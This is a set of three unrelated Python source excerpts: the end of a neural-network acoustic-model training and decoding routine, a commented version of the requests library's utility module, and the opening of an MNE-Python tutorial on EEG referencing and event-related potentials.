for _ in range(step-validation_step):
dispenser.return_batch()
#load the validated model
trainer.restore_trainer(self.conf['savedir']
+ '/training/validated')
trainer.halve_learning_rate()
step = validation_step
if num_retries == int(self.conf['valid_retries']):
print ('the validation loss is worse, '
'terminating training')
break
print ('the validation loss is worse, returning to '
'the previously validated model with halved '
'learning rate')
num_retries += 1
continue
else:
validation_loss = current_loss
validation_step = step
num_retries = 0
trainer.save_trainer(self.conf['savedir']
+ '/training/validated')
#add a layer if its required
if int(self.conf['add_layer_period']) > 0:
if (step%int(self.conf['add_layer_period']) == 0
and (step/int(self.conf['add_layer_period'])
< int(self.conf['num_hidden_layers']))):
print 'adding layer, the model now holds %d/%d layers'%(
step/int(self.conf['add_layer_period']) + 1,
int(self.conf['num_hidden_layers']))
trainer.control_ops['add'].run()
trainer.control_ops['init'].run()
#do a validation step
validation_loss = trainer.evaluate(val_data, val_labels)
print 'validation loss at step %d: %f' % (
step, validation_loss)
validation_step = step
trainer.save_trainer(self.conf['savedir']
+ '/training/validated')
num_retries = 0
#save the model if at checkpoint
if step%int(self.conf['check_freq']) == 0:
trainer.save_trainer(self.conf['savedir'] + '/training/step'
+ str(step))
#save the final model
trainer.save_model(self.conf['savedir'] + '/final')
#compute the state prior and write it to the savedir
prior = dispenser.compute_target_count().astype(np.float32)
prior = prior/prior.sum()
np.save(self.conf['savedir'] + '/prior.npy', prior)
def decode(self, reader, writer):
'''
compute pseudo likelihoods the testing set
Args:
reader: a feature reader object to read features to decode
writer: a writer object to write likelihoods
'''
#create a decoder
decoder = Decoder(self.dnn, self.input_dim, reader.max_input_length)
#read the prior
prior = np.load(self.conf['savedir'] + '/prior.npy')
#start tensorflow session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True #pylint: disable=E1101
with tf.Session(graph=decoder.graph, config=config):
#load the model
decoder.restore(self.conf['savedir'] + '/final')
#feed the utterances one by one to the neural net
while True:
utt_id, utt_mat, looped = reader.get_utt()
if looped:
break
#compute predictions
output = decoder(utt_mat)
#get state likelihoods by dividing by the prior
output = output/prior
#floor the values to avoid problems with log
np.where(output == 0, np.finfo(float).eps, output)
#write the pseudo-likelihoods in kaldi feature format
writer.write_next_utt(utt_id, np.log(output))
#close the writer
writer.close()
| |
# -*- coding: utf-8 -*-
"""
requests.utils
~~~~~~~~~~~~~~
This module provides utility functions that are used within Requests
that are also useful for external consumption.
"""
import cgi
import codecs
import collections
import contextlib
import io
import os
import platform
import re
import socket
import struct
import warnings
from . import __version__
from . import certs
# to_native_string is unused here, but imported here for backwards compatibility
from ._internal_utils import to_native_string
from .compat import parse_http_list as _parse_list_header
from .compat import (
quote, urlparse, bytes, str, OrderedDict, unquote, getproxies,
proxy_bypass, urlunparse, basestring, integer_types, is_py3,
proxy_bypass_environment, getproxies_environment)
from .cookies import cookiejar_from_dict
from .structures import CaseInsensitiveDict
from .exceptions import (
InvalidURL, InvalidHeader, FileModeWarning, UnrewindableBodyError)
NETRC_FILES = ('.netrc', '_netrc')
DEFAULT_CA_BUNDLE_PATH = certs.where()
if platform.system() == 'Windows':
    # provide a proxy_bypass version on Windows without DNS lookups

    def proxy_bypass_registry(host):
        """Decide from the per-user Windows registry Internet Settings
        whether *host* should bypass the configured proxy.

        Returns True when *host* matches one of the ``ProxyOverride``
        patterns, False otherwise (including when proxying is disabled
        or the registry cannot be read).
        """
        if is_py3:
            import winreg
        else:
            import _winreg as winreg
        try:
            internetSettings = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                r'Software\Microsoft\Windows\CurrentVersion\Internet Settings')
            # ProxyEnable is a DWORD flag; ProxyOverride is a
            # ';'-separated list of host patterns that skip the proxy.
            proxyEnable = winreg.QueryValueEx(internetSettings,
                                              'ProxyEnable')[0]
            proxyOverride = winreg.QueryValueEx(internetSettings,
                                                'ProxyOverride')[0]
        except OSError:
            return False
        if not proxyEnable or not proxyOverride:
            return False
        # make a check value list from the registry entry: replace the
        # '<local>' string by the localhost entry and the corresponding
        # canonical entry.
        proxyOverride = proxyOverride.split(';')
        # now check if we match one of the registry values.
        for test in proxyOverride:
            if test == '<local>':
                # '<local>' means "bypass for plain host names" (no dots)
                if '.' not in host:
                    return True
            # translate the glob-style registry pattern into a regex
            test = test.replace(".", r"\.")     # mask dots
            test = test.replace("*", r".*")     # change glob sequence
            test = test.replace("?", r".")      # change glob char
            if re.match(test, host, re.I):
                return True
        return False

    def proxy_bypass(host):  # noqa
        """Return True, if the host should be bypassed.

        Checks proxy settings gathered from the environment, if specified,
        or the registry.
        """
        if getproxies_environment():
            return proxy_bypass_environment(host)
        else:
            return proxy_bypass_registry(host)
def dict_to_sequence(d):
    """Returns an internal sequence dictionary update."""
    # Mappings become their (key, value) item view; anything else is
    # assumed to already be a sequence and handed back unchanged.
    return d.items() if hasattr(d, 'items') else d
def super_len(o):
    """Best-effort number of bytes remaining to be read from *o*.

    Handles plain sized objects (``__len__``), urllib3-style objects
    exposing a ``len`` attribute, and real files (``fileno``), then
    subtracts the current read position (``tell``) so partially read
    files report only what is left.  Never returns a negative number.
    """
    total_length = None
    current_position = 0

    if hasattr(o, '__len__'):
        total_length = len(o)

    elif hasattr(o, 'len'):
        # e.g. urllib3 filepost objects expose ``len`` as an attribute
        total_length = o.len

    elif hasattr(o, 'fileno'):
        try:
            fileno = o.fileno()
        except io.UnsupportedOperation:
            # file-like object without a real descriptor (BytesIO, ...);
            # fall through to the tell/seek probing below
            pass
        else:
            total_length = os.fstat(fileno).st_size

            # Having used fstat to determine the file length, we need to
            # confirm that this file was opened up in binary mode.
            if 'b' not in o.mode:
                warnings.warn((
                    "Requests has determined the content-length for this "
                    "request using the binary size of the file: however, the "
                    "file has been opened in text mode (i.e. without the 'b' "
                    "flag in the mode). This may lead to an incorrect "
                    "content-length. In Requests 3.0, support will be removed "
                    "for files in text mode."),
                    FileModeWarning
                )

    if hasattr(o, 'tell'):
        try:
            current_position = o.tell()
        except (OSError, IOError):
            # This can happen in some weird situations, such as when the file
            # is actually a special file descriptor like stdin. In this
            # instance, we don't know what the length is, so set it to zero and
            # let requests chunk it instead.
            if total_length is not None:
                current_position = total_length
        else:
            if hasattr(o, 'seek') and total_length is None:
                # StringIO and BytesIO have seek but no useable fileno
                try:
                    # seek to end of file
                    o.seek(0, 2)
                    total_length = o.tell()

                    # seek back to current position to support
                    # partially read file-like objects
                    o.seek(current_position or 0)
                except (OSError, IOError):
                    total_length = 0

    if total_length is None:
        total_length = 0

    return max(0, total_length - current_position)
def get_netrc_auth(url, raise_errors=False):
    """Returns the Requests tuple auth for a given url from netrc.

    :param url: URL whose host is looked up in the user's netrc file.
    :param raise_errors: when True, re-raise netrc parse/permission
        errors instead of silently skipping netrc auth.
    :returns: ``(login, password)`` tuple, or ``None`` when no netrc
        file or no matching entry is found.
    """
    try:
        from netrc import netrc, NetrcParseError

        netrc_path = None

        # look for ~/.netrc (POSIX) or ~/_netrc (Windows convention)
        for f in NETRC_FILES:
            try:
                loc = os.path.expanduser('~/{0}'.format(f))
            except KeyError:
                # os.path.expanduser can fail when $HOME is undefined and
                # getpwuid fails. See http://bugs.python.org/issue20164 &
                # https://github.com/kennethreitz/requests/issues/1846
                return

            if os.path.exists(loc):
                netrc_path = loc
                break

        # Abort early if there isn't one.
        if netrc_path is None:
            return

        ri = urlparse(url)

        # Strip port numbers from netloc. This weird `if...encode`` dance is
        # used for Python 3.2, which doesn't support unicode literals.
        splitstr = b':'
        if isinstance(url, str):
            splitstr = splitstr.decode('ascii')
        host = ri.netloc.split(splitstr)[0]

        try:
            _netrc = netrc(netrc_path).authenticators(host)
            if _netrc:
                # Return with login / password
                # (netrc entries are (login, account, password); prefer the
                # account field when the login field is empty)
                login_i = (0 if _netrc[0] else 1)
                return (_netrc[login_i], _netrc[2])
        except (NetrcParseError, IOError):
            # If there was a parsing error or a permissions issue reading the file,
            # we'll just skip netrc auth unless explicitly asked to raise errors.
            if raise_errors:
                raise

    # AppEngine hackiness.
    except (ImportError, AttributeError):
        pass
def guess_filename(obj):
    """Tries to guess the filename of the given object."""
    name = getattr(obj, 'name', None)
    # no usable name, or not a string at all
    if not name or not isinstance(name, basestring):
        return None
    # pseudo-files such as '<stdin>' carry no real filename
    if name[0] == '<' or name[-1] == '>':
        return None
    return os.path.basename(name)
def from_key_val_list(value):
    """Take an object and test to see if it can be represented as a
    dictionary. Unless it can not be represented as such, return an
    OrderedDict, e.g.,

    ::

        >>> from_key_val_list([('key', 'val')])
        OrderedDict([('key', 'val')])
        >>> from_key_val_list('string')
        ValueError: need more than 1 value to unpack
        >>> from_key_val_list({'key': 'val'})
        OrderedDict([('key', 'val')])

    :rtype: OrderedDict
    """
    if value is None:
        return None

    # plain scalars cannot be interpreted as key/value pairs
    scalar_types = (str, bytes, bool, int)
    if isinstance(value, scalar_types):
        raise ValueError('cannot encode objects that are not 2-tuples')

    return OrderedDict(value)
def to_key_val_list(value):
    """Take an object and test to see if it can be represented as a
    dictionary. If it can be, return a list of tuples, e.g.,

    ::

        >>> to_key_val_list([('key', 'val')])
        [('key', 'val')]
        >>> to_key_val_list({'key': 'val'})
        [('key', 'val')]
        >>> to_key_val_list('string')
        ValueError: cannot encode objects that are not 2-tuples.

    :param value: a mapping, an iterable of 2-tuples, or None.
    :raises ValueError: if *value* is a scalar that cannot represent
        key/value pairs.
    :rtype: list
    """
    if value is None:
        return None

    if isinstance(value, (str, bytes, bool, int)):
        raise ValueError('cannot encode objects that are not 2-tuples')

    # ``collections.Mapping`` was deprecated in Python 3.3 and removed in
    # Python 3.10; import from collections.abc with a Python 2 fallback.
    try:
        from collections.abc import Mapping
    except ImportError:  # Python 2
        from collections import Mapping
    if isinstance(value, Mapping):
        value = value.items()

    return list(value)
# From mitsuhiko/werkzeug (used with permission).
def parse_list_header(value):
    """Parse lists as described by RFC 2068 Section 2.

    In particular, parse comma-separated lists where the elements of
    the list may include quoted-strings.  A quoted-string could
    contain a comma.  A non-quoted string could have quotes in the
    middle.  Quotes are removed automatically after parsing.

    It basically works like :func:`parse_set_header` just that items
    may appear multiple times and case sensitivity is preserved.

    The return value is a standard :class:`list`:

    >>> parse_list_header('token, "quoted value"')
    ['token', 'quoted value']

    To create a header from the :class:`list` again, use the
    :func:`dump_header` function.

    :param value: a string with a list header.
    :return: :class:`list`
    :rtype: list
    """
    items = []
    for element in _parse_list_header(value):
        # strip surrounding quotes and undo backslash escaping
        if element[:1] == element[-1:] == '"':
            element = unquote_header_value(element[1:-1])
        items.append(element)
    return items
# From mitsuhiko/werkzeug (used with permission).
def parse_dict_header(value):
    """Parse lists of key, value pairs as described by RFC 2068 Section 2 and
    convert them into a python dict:

    >>> d = parse_dict_header('foo="is a fish", bar="as well"')
    >>> type(d) is dict
    True
    >>> sorted(d.items())
    [('bar', 'as well'), ('foo', 'is a fish')]

    If there is no value for a key it will be `None`:

    >>> parse_dict_header('key_without_value')
    {'key_without_value': None}

    To create a header from the :class:`dict` again, use the
    :func:`dump_header` function.

    :param value: a string with a dict header.
    :return: :class:`dict`
    :rtype: dict
    """
    parsed = {}
    for item in _parse_list_header(value):
        if '=' not in item:
            # bare token: present but valueless
            parsed[item] = None
            continue
        name, value = item.split('=', 1)
        # strip quoting from the value part, if any
        if value[:1] == value[-1:] == '"':
            value = unquote_header_value(value[1:-1])
        parsed[name] = value
    return parsed
# From mitsuhiko/werkzeug (used with permission).
def unquote_header_value(value, is_filename=False):
    r"""Unquotes a header value. (Reversal of :func:`quote_header_value`).

    This mimics what browsers actually do rather than strict RFC
    unquoting; IE, for example, uploads files with "C:\foo\bar.txt" as
    the (quoted) filename, so strict unquoting would corrupt it.

    :param value: the header value to unquote.
    :param is_filename: set when the value is a filename, so UNC paths
        (leading ``\\``) are returned without unescaping.
    :rtype: str
    """
    if not (value and value[0] == value[-1] == '"'):
        # not a quoted-string; hand it back untouched
        return value
    inner = value[1:-1]
    # A filename beginning with '\\' is a UNC path; collapsing the
    # doubled backslashes would destroy the leading double slash
    # (and break _fix_ie_filename, see #458).
    if is_filename and inner[:2] == '\\\\':
        return inner
    return inner.replace('\\\\', '\\').replace('\\"', '"')
def dict_from_cookiejar(cj):
    """Returns a key/value dictionary from a CookieJar.

    :param cj: CookieJar object to extract cookies from.
    :rtype: dict
    """
    # later cookies with the same name overwrite earlier ones,
    # matching the behavior of a plain insertion loop
    return {cookie.name: cookie.value for cookie in cj}
def add_dict_to_cookiejar(cj, cookie_dict):
    """Returns a CookieJar from a key/value dictionary.

    :param cj: CookieJar to insert cookies into.
    :param cookie_dict: Dict of key/values to insert into CookieJar.
    :rtype: CookieJar
    """
    # delegates to cookiejar_from_dict, which inserts the dict's entries
    # into *cj* and returns the jar
    return cookiejar_from_dict(cookie_dict, cj)
def get_encodings_from_content(content):
    """Returns encodings from given content string.

    Scans ``<meta charset=...>``, ``<meta content=...;charset=...>`` and
    the XML declaration, in that order.

    :param content: bytestring to extract encodings from.
    """
    warnings.warn((
        'In requests 3.0, get_encodings_from_content will be removed. For '
        'more information, please see the discussion on issue #2266. (This'
        ' warning should only appear once.)'),
        DeprecationWarning)

    patterns = (
        re.compile(r'<meta.*?charset=["\']*(.+?)["\'>]', flags=re.I),
        re.compile(r'<meta.*?content=["\']*;?charset=(.+?)["\'>]', flags=re.I),
        re.compile(r'^<\?xml.*?encoding=["\']*(.+?)["\'>]'),
    )
    found = []
    for pattern in patterns:
        found.extend(pattern.findall(content))
    return found
def get_encoding_from_headers(headers):
    """Returns encodings from given HTTP Header Dict.

    :param headers: dictionary to extract encoding from.
    :returns: the charset parameter of the Content-Type header, the
        ISO-8859-1 default for ``text/*`` types, or None.
    :rtype: str
    """
    content_type = headers.get('content-type')

    if not content_type:
        return None

    # Parse "type/subtype; key=value; ..." by hand instead of with
    # ``cgi.parse_header``: the ``cgi`` module was deprecated in
    # Python 3.11 and removed in Python 3.13.
    tokens = content_type.split(';')
    content_type, raw_params = tokens[0].strip(), tokens[1:]
    params = {}
    items_to_strip = "\"' "
    for param in raw_params:
        param = param.strip()
        if param:
            key, value = param, True
            index_of_equals = param.find('=')
            if index_of_equals != -1:
                key = param[:index_of_equals].strip(items_to_strip)
                value = param[index_of_equals + 1:].strip(items_to_strip)
            params[key.lower()] = value

    if 'charset' in params:
        return params['charset'].strip("'\"")

    if 'text' in content_type:
        # RFC 2616 default charset for text/* media types
        return 'ISO-8859-1'
def stream_decode_response_unicode(iterator, r):
    """Stream decodes a iterator."""
    encoding = r.encoding
    # Without a known encoding we cannot decode; pass chunks through.
    if encoding is None:
        for chunk in iterator:
            yield chunk
        return

    decoder = codecs.getincrementaldecoder(encoding)(errors='replace')
    for chunk in iterator:
        decoded = decoder.decode(chunk)
        if decoded:
            yield decoded
    # flush anything the incremental decoder is still buffering
    tail = decoder.decode(b'', final=True)
    if tail:
        yield tail
def iter_slices(string, slice_length):
    """Iterate over slices of a string."""
    # Non-positive or missing lengths mean "everything in one slice".
    if slice_length is None or slice_length <= 0:
        slice_length = len(string)
    if not string:
        return
    for start in range(0, len(string), slice_length):
        yield string[start:start + slice_length]
def get_unicode_from_response(r):
    """Returns the requested content back in unicode.

    :param r: Response object to get unicode content from.

    Tried:

    1. charset from content-type
    2. fall back and replace all unicode characters

    :rtype: str
    """
    warnings.warn((
        'In requests 3.0, get_unicode_from_response will be removed. For '
        'more information, please see the discussion on issue #2266. (This'
        ' warning should only appear once.)'),
        DeprecationWarning)

    tried_encodings = []

    # Try charset from content-type
    encoding = get_encoding_from_headers(r.headers)

    if encoding:
        try:
            return str(r.content, encoding)
        except UnicodeError:
            # remember the failed charset before falling back
            tried_encodings.append(encoding)

    # Fall back:
    try:
        # errors='replace' substitutes undecodable bytes instead of raising
        return str(r.content, encoding, errors='replace')
    except TypeError:
        # encoding is None (no charset header): return raw content as-is
        return r.content
# The unreserved URI characters (RFC 3986)
UNRESERVED_SET = frozenset(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    + "0123456789-._~")


def unquote_unreserved(uri):
    """Un-escape any percent-escape sequences in a URI that are unreserved
    characters. This leaves all reserved, illegal and non-ASCII bytes encoded.

    :rtype: str
    """
    parts = uri.split('%')
    # parts[0] precedes the first '%'; every later part begins with the
    # two hex digits of a percent-escape (when well-formed).
    decoded = [parts[0]]
    for part in parts[1:]:
        h = part[0:2]
        if len(h) == 2 and h.isalnum():
            try:
                c = chr(int(h, 16))
            except ValueError:
                raise InvalidURL("Invalid percent-escape sequence: '%s'" % h)
            if c in UNRESERVED_SET:
                # unreserved characters are safe to decode in place
                decoded.append(c + part[2:])
            else:
                decoded.append('%' + part)
        else:
            decoded.append('%' + part)
    return ''.join(decoded)
def requote_uri(uri):
    """Re-quote the given URI.

    This function passes the given URI through an unquote/quote cycle to
    ensure that it is fully and consistently quoted.

    :rtype: str
    """
    safe_without_percent = "!#$&'()*+,/:;=?@[]~"
    safe_with_percent = '%' + safe_without_percent
    try:
        # Unquote only the unreserved characters, then quote only illegal
        # characters (do not quote reserved, unreserved, or '%').
        return quote(unquote_unreserved(uri), safe=safe_with_percent)
    except InvalidURL:
        # The URI contains a malformed percent-escape, so unquoting
        # failed. Quote it as-is; dropping '%' from the safe set makes
        # sure any stray '%' gets escaped too.
        return quote(uri, safe=safe_without_percent)
def address_in_network(ip, net):
    """This function allows you to check if an IP belongs to a network subnet

    Example: returns True if ip = 192.168.1.1 and net = 192.168.1.0/24
             returns False if ip = 192.168.1.1 and net = 192.168.100.0/24

    :rtype: bool
    """
    netaddr, bits = net.split('/')
    # all three values are native-order unsigned 32-bit integers
    netmask = struct.unpack('=L', socket.inet_aton(dotted_netmask(int(bits))))[0]
    ipaddr = struct.unpack('=L', socket.inet_aton(ip))[0]
    network = struct.unpack('=L', socket.inet_aton(netaddr))[0] & netmask
    return (ipaddr & netmask) == (network & netmask)
def dotted_netmask(mask):
    """Converts mask from /xx format to xxx.xxx.xxx.xxx

    Example: if mask is 24 function returns 255.255.255.0

    :rtype: str
    """
    # set the top ``mask`` bits of a 32-bit word, then render it
    # in dotted-quad notation (big-endian, as inet_ntoa expects)
    host_bits = 32 - mask
    bits = 0xffffffff ^ ((1 << host_bits) - 1)
    return socket.inet_ntoa(struct.pack('>I', bits))
def is_ipv4_address(string_ip):
    """Check whether *string_ip* parses as an IPv4 address.

    :rtype: bool
    """
    try:
        socket.inet_aton(string_ip)
        return True
    except socket.error:
        return False
def is_valid_cidr(string_network):
    """
    Very simple check of the cidr format in no_proxy variable.

    :rtype: bool
    """
    # expect exactly one '/' separating address and prefix length
    if string_network.count('/') != 1:
        return False
    address, _, prefix = string_network.partition('/')
    try:
        mask = int(prefix)
    except ValueError:
        return False
    # only /1 .. /32 prefixes are accepted (/0 is rejected)
    if not 1 <= mask <= 32:
        return False
    try:
        socket.inet_aton(address)
    except socket.error:
        return False
    return True
@contextlib.contextmanager
def set_environ(env_name, value):
    """Set the environment variable 'env_name' to 'value'

    Save previous value, yield, and then restore the previous value stored in
    the environment variable 'env_name'.

    If 'value' is None, do nothing"""
    if value is None:
        # nothing to change; still act as a context manager
        yield
        return
    previous = os.environ.get(env_name)
    os.environ[env_name] = value
    try:
        yield
    finally:
        # restore (or remove) the variable even if the body raised
        if previous is None:
            del os.environ[env_name]
        else:
            os.environ[env_name] = previous
def should_bypass_proxies(url, no_proxy):
    """
    Returns whether we should bypass proxies or not.

    :param url: the URL being requested.
    :param no_proxy: comma-separated override list of hosts/CIDRs; when
        None, the NO_PROXY/no_proxy environment variable is consulted.
    :rtype: bool
    """
    # checks both the lower- and upper-case spelling of the variable
    get_proxy = lambda k: os.environ.get(k) or os.environ.get(k.upper())

    # First check whether no_proxy is defined. If it is, check that the URL
    # we're getting isn't in the no_proxy list.
    no_proxy_arg = no_proxy
    if no_proxy is None:
        no_proxy = get_proxy('no_proxy')
    netloc = urlparse(url).netloc

    if no_proxy:
        # We need to check whether we match here. We need to see if we match
        # the end of the netloc, both with and without the port.
        no_proxy = (
            host for host in no_proxy.replace(' ', '').split(',') if host
        )

        # netloc may carry a ':port' suffix; strip it for the IP check
        ip = netloc.split(':')[0]
        if is_ipv4_address(ip):
            for proxy_ip in no_proxy:
                if is_valid_cidr(proxy_ip):
                    if address_in_network(ip, proxy_ip):
                        return True
                elif ip == proxy_ip:
                    # If no_proxy ip was defined in plain IP notation instead of cidr notation &
                    # matches the IP of the index
                    return True
        else:
            for host in no_proxy:
                if netloc.endswith(host) or netloc.split(':')[0].endswith(host):
                    # The URL does match something in no_proxy, so we don't want
                    # to apply the proxies on this URL.
                    return True

    # If the system proxy settings indicate that this URL should be bypassed,
    # don't proxy.
    # The proxy_bypass function is incredibly buggy on OS X in early versions
    # of Python 2.6, so allow this call to fail. Only catch the specific
    # exceptions we've seen, though: this call failing in other ways can reveal
    # legitimate problems.
    # NOTE: the caller's no_proxy override is temporarily mirrored into the
    # environment so platform proxy_bypass implementations can see it.
    with set_environ('no_proxy', no_proxy_arg):
        try:
            bypass = proxy_bypass(netloc)
        except (TypeError, socket.gaierror):
            bypass = False

    if bypass:
        return True

    return False
def get_environ_proxies(url, no_proxy):
    """
    Return a dict of environment proxies.

    :rtype: dict
    """
    # an empty mapping means "connect directly"
    return {} if should_bypass_proxies(url, no_proxy=no_proxy) else getproxies()
def select_proxy(url, proxies):
    """Select a proxy for the url, if applicable.

    :param url: The url being for the request
    :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs
    """
    proxies = proxies or {}
    parts = urlparse(url)
    if parts.hostname is None:
        # no host in the URL: scheme-wide proxy, else the catch-all
        return proxies.get(parts.scheme, proxies.get('all'))

    # most specific key wins, checked in this order
    candidates = (
        parts.scheme + '://' + parts.hostname,
        parts.scheme,
        'all://' + parts.hostname,
        'all',
    )
    for key in candidates:
        if key in proxies:
            return proxies[key]
    return None
def default_user_agent(name="python-requests"):
    """
    Return a string representing the default user agent.

    :rtype: str
    """
    # e.g. "python-requests/2.18.0"
    return '{0}/{1}'.format(name, __version__)
def default_headers():
    """Build the headers sent with every request by default.

    :rtype: requests.structures.CaseInsensitiveDict
    """
    headers = CaseInsensitiveDict()
    headers['User-Agent'] = default_user_agent()
    headers['Accept-Encoding'] = ', '.join(('gzip', 'deflate'))
    headers['Accept'] = '*/*'
    headers['Connection'] = 'keep-alive'
    return headers
def parse_header_links(value):
    """Return a dict of parsed link headers proxies.

    i.e. Link: <http:/.../front.jpeg>; rel=front; type="image/jpeg",<http://.../back.jpeg>; rel=back;type="image/jpeg"

    :param value: the ``Link`` header value.
    :rtype: list
    """
    links = []
    replace_chars = ' \'"'

    # BUG FIX: an empty (or whitespace/quote-only) header used to yield
    # a single bogus entry ``[{'url': ''}]``; it now yields no links.
    value = value.strip(replace_chars)
    if not value:
        return links

    for val in re.split(', *<', value):
        try:
            url, params = val.split(';', 1)
        except ValueError:
            # no parameters on this link
            url, params = val, ''

        link = {'url': url.strip('<> \'"')}

        for param in params.split(';'):
            try:
                key, value = param.split('=')
            except ValueError:
                break
            link[key.strip(replace_chars)] = value.strip(replace_chars)

        links.append(link)

    return links
# Null bytes; no need to recreate these on each call to guess_json_utf
_null = '\x00'.encode('ascii') # encoding to ASCII for Python 3
_null2 = _null * 2
_null3 = _null * 3
def guess_json_utf(data):
    """Guess the UTF flavour of a JSON byte string from its first bytes.

    :param data: JSON document as bytes.
    :returns: a codec name, or None when no UTF family could be detected.
    :rtype: str
    """
    # JSON always starts with two ASCII characters, so detection is as
    # easy as counting the nulls and from their location and count
    # determine the encoding. Also detect a BOM, if present.
    sample = data[:4]
    # explicit BOMs win outright
    if sample in (codecs.BOM_UTF32_LE, codecs.BOM_UTF32_BE):
        return 'utf-32'     # BOM included
    if sample[:3] == codecs.BOM_UTF8:
        return 'utf-8-sig'  # BOM included, MS style (discouraged)
    if sample[:2] in (codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE):
        return 'utf-16'     # BOM included
    # no BOM: infer from the null-byte pattern of two ASCII characters
    nullcount = sample.count(_null)
    if nullcount == 0:
        return 'utf-8'
    if nullcount == 2:
        if sample[::2] == _null2:   # 1st and 3rd are null
            return 'utf-16-be'
        if sample[1::2] == _null2:  # 2nd and 4th are null
            return 'utf-16-le'
        # Did not detect 2 valid UTF-16 ascii-range characters
    if nullcount == 3:
        if sample[:3] == _null3:
            return 'utf-32-be'
        if sample[1:] == _null3:
            return 'utf-32-le'
        # Did not detect a valid UTF-32 ascii-range character
    return None
def prepend_scheme_if_needed(url, new_scheme):
    """Given a URL that may or may not have a scheme, prepend the given scheme.
    Does not replace a present scheme with the one provided as an argument.

    :rtype: str
    """
    parsed = urlparse(url, new_scheme)
    netloc, path = parsed.netloc, parsed.path

    # urlparse can mistake "host/path" for a bare path when no '//' is
    # present; assume it is over-cautious and treat the leading path
    # segment as the netloc in that case.
    if not netloc:
        netloc, path = path, netloc

    return urlunparse((parsed.scheme, netloc, path, parsed.params,
                       parsed.query, parsed.fragment))
def get_auth_from_url(url):
    """Given a url with authentication components, extract them into a tuple of
    username,password.

    :rtype: (str,str)
    """
    parsed = urlparse(url)
    try:
        # either component may be percent-encoded
        return (unquote(parsed.username), unquote(parsed.password))
    except (AttributeError, TypeError):
        # unquote chokes on None when the URL has no auth section
        return ('', '')
# Moved outside of function to avoid recompile every call
_CLEAN_HEADER_REGEX_BYTE = re.compile(b'^\\S[^\\r\\n]*$|^$')
_CLEAN_HEADER_REGEX_STR = re.compile(r'^\S[^\r\n]*$|^$')


def check_header_validity(header):
    """Verifies that header value is a string which doesn't contain
    leading whitespace or return characters. This prevents unintended
    header injection.

    :param header: tuple, in the format (name, value).
    """
    name, value = header
    # pick the pattern matching the value's type (bytes vs text)
    if isinstance(value, bytes):
        pat = _CLEAN_HEADER_REGEX_BYTE
    else:
        pat = _CLEAN_HEADER_REGEX_STR
    try:
        matched = pat.match(value)
    except TypeError:
        # pat.match rejects anything that is neither str nor bytes
        raise InvalidHeader("Header value %s must be of type str or bytes, "
                            "not %s" % (value, type(value)))
    if not matched:
        raise InvalidHeader("Invalid return character or leading space in header: %s" % name)
def urldefragauth(url):
    """
    Given a url remove the fragment and the authentication part.

    :rtype: str
    """
    parts = urlparse(url)
    netloc, path = parts.netloc, parts.path

    # see func:`prepend_scheme_if_needed`
    if not netloc:
        netloc, path = path, netloc

    # drop any "user:pass@" prefix from the network location
    netloc = netloc.rsplit('@', 1)[-1]

    return urlunparse((parts.scheme, netloc, path, parts.params,
                       parts.query, ''))
def rewind_body(prepared_request):
    """Move file pointer back to its recorded starting position
    so it can be read again on redirect.

    :param prepared_request: request whose ``body`` is a file-like
        object and whose ``_body_position`` records where reading began.
    :raises UnrewindableBodyError: if the body cannot be rewound.
    """
    body_seek = getattr(prepared_request.body, 'seek', None)
    # only rewind when the body is seekable AND a numeric start position
    # was recorded when the body was first read
    if body_seek is not None and isinstance(prepared_request._body_position, integer_types):
        try:
            body_seek(prepared_request._body_position)
        except (IOError, OSError):
            raise UnrewindableBodyError("An error occurred when rewinding request "
                                        "body for redirect.")
    else:
        raise UnrewindableBodyError("Unable to rewind request body for redirect.")
| |
"""
.. _tut_erp:
EEG processing and Event Related Potentials (ERPs)
==================================================
.. contents:: Here we cover the specifics of EEG, namely:
:local:
:depth: 1
"""
import mne
from mne.datasets import sample
from mne.channels import combine_channels
###############################################################################
# Setup for reading the raw data
data_path = sample.data_path()
raw_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw.fif'
event_fname = data_path + '/MEG/sample/sample_audvis_filt-0-40_raw-eve.fif'
raw = mne.io.read_raw_fif(raw_fname)
###############################################################################
# Let's restrict the data to the EEG channels
raw.pick_types(meg=False, eeg=True, eog=True).load_data()
# This particular dataset already has an average reference projection added
# that we now want to remove for the sake of this example.
raw.set_eeg_reference([])
###############################################################################
# By looking at the measurement info you will see that we have now
# 59 EEG channels and 1 EOG channel
print(raw.info)
###############################################################################
# In practice it's quite common to have some EEG channels that are actually
# EOG channels. To change a channel type you can use the
# :func:`mne.io.Raw.set_channel_types` method. For example
# to treat an EOG channel as EEG you can change its type using
raw.set_channel_types(mapping={'EOG 061': 'eeg'})
print(raw.info)
###############################################################################
# And to change the name of the EOG channel
raw.rename_channels(mapping={'EOG 061': 'EOG'})
###############################################################################
# Let's reset the EOG channel back to EOG type.
raw.set_channel_types(mapping={'EOG': 'eog'})
###############################################################################
# The EEG channels in the sample dataset already have locations.
# These locations are available in the 'loc' of each channel description.
# For the first channel we get
print(raw.info['chs'][0]['loc'])
###############################################################################
# And it's actually possible to plot the channel locations using
# :func:`mne.io.Raw.plot_sensors`.
# In the case where your data don't have locations you can use one of the
# standard :class:`Montages <mne.channels.DigMontage>` shipped with MNE.
# See :ref:`plot_montage` and :ref:`tut-eeg-fsaverage-source-modeling`.
raw.plot_sensors()
raw.plot_sensors('3d')  # in 3D
###############################################################################
# Setting EEG reference
# ---------------------
#
# Let's first inspect our Raw object with its original reference that was
# applied during the recording of the data.
# We define Epochs and compute an ERP for the left auditory condition.
# NOTE: reject thresholds are peak-to-peak amplitudes in volts
# (180 uV for EEG, 150 uV for EOG).
reject = dict(eeg=180e-6, eog=150e-6)
event_id, tmin, tmax = {'left/auditory': 1}, -0.2, 0.5
events = mne.read_events(event_fname)
epochs_params = dict(events=events, event_id=event_id, tmin=tmin, tmax=tmax,
                     reject=reject)
evoked_no_ref = mne.Epochs(raw, **epochs_params).average()
title = 'EEG Original reference'
evoked_no_ref.plot(titles=dict(eeg=title), time_unit='s')
evoked_no_ref.plot_topomap(times=[0.1], size=3., title=title, time_unit='s')
###############################################################################
# **Common average reference (car)**: We add back the average reference
# projection that we removed at the beginning of this example (right after
# loading the data).
raw_car, _ = mne.set_eeg_reference(raw, 'average', projection=True)
